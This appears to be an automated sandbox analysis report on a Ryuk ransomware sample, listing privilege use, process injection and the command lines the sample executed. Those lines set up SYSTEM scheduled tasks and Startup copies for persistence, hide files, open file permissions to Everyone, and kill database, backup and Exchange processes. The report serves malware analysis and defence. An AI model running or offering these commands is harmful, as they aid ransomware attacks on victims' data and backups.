N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4040 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1900 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1900 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1592 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1592 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4152 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4152 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4040 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 5088 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5088 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4020 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4020 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4040 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 208 wrote to memory of 3776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 208 wrote to memory of 3776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4040 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3252 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4040 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4652 wrote to memory of 4992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3780 wrote to memory of 4872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3780 wrote to memory of 4872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3780 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3780 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4040 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1344 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4872 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4872 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4040 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1448 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1448 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

